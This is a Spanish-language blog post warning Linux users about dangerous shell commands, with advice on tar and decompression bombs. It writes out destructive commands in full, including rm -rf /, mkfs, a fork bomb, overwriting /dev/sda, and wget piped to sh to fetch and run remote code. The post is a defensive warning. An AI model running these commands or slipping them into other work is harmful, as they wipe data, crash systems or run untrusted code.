Cuidado con estos comandos peligrosos en Linux

GNU/LINUX

Si bien Linux es un sistema operativo que se caracteriza entre tantas cosas por la seguridad que ofrece, tampoco está exento de usuarios malintencionados que buscan explotar las funciones de algunos comandos para ocasionar daños, por eso es importante que conozcas cuáles son esos comandos que debes evitar a toda costa y lo que son capaces de lograr en tu ordenador.

Estos son los comandos que hay que tener mucho cuidado a la hora de ejecutarlos:

rm -rf /
Elimina todos los archivos en el directorio root.

rm -rf .
Elimina el directorio actual y sus subdirectorios.

rm -rf *
Elimina todos los archivos en el directorio actual y en sus subdirectorios.

mkfs.sistema_de_archivos
Formatea el sistema de archivos al especificado (ext2, ext3, ext4, etc…). Causa la pérdida de archivos.

: (){:|:&};:
(eliminar el espacio entre : y ( )

Conocido como ‘forkbomb’ provoca la ejecución de un gran número de procesos hasta que el sistema se bloquee, obligando al usuario a forzar el reinicio, lo que puede ocasionar pérdida de datos y otros daños.

En Perl el comando es equivalente a:

fork while fork
cualquier_comando > /dev/sda Sobreescribe el dispositivo de bloques (/dev/sda) con datos en bruto, ocasionando la pérdida total de los datos actuales.

wget http://url/archivo -O- | sh
o

wget http://url
sh ./archivo
Descarga un script o ejecutable desde alguna dirección web y la ejecuta en el ordenador.

mv /home/usuario/* /dev/null
Mueve todas las carpetas en el directorio /home del usuario al directorio /dev/null, lo que ocasiona la pérdida de archivos.

Además de evitar ejecutar los comandos anteriores, también deben tomarse algunas precauciones al descomprimir archivos descargados de la web:

‘Tarbomb’ o bomba tar

Si alguien te pide descomprimir un archivo tar en un directorio determinado no lo hagas, ya que el archivo podría haber sido manipulado para ‘explotar’ en millones de ficheros al ser descomprimido, o para inyectar archivos en el sistema. Siempre que necesites descomprimir un tar hazlo primeramente en un directorio ‘limpio’ que no contenga otros archivos, y después de comprobar que el contenido del fichero es el que esperabas puedes pasarlo al directorio final.

Bombas de descompresión

Las bombas de descompresión son archivos muy pequeños que al descomprimirse pueden ocupar giga-bytes de espacio en el disco duro. Por eso si alguien te pide extraer los contenidos de un archivo comprimido que parece ser muy pequeño, lo mejor es que lo evites, si es posible.

Por último vale la pena recordar una simple medida de seguridad que es válida no sólo para usuarios de Linux, sino también de cualquier otra plataforma, y es siempre evitar descargar archivos de fuentes no confiables, ya que podrían contener código malicioso y en consecuencia causar daños y pérdidas irreparables.

Fuente: http://planetared.com

Tema Relacionado: GNU/LINUX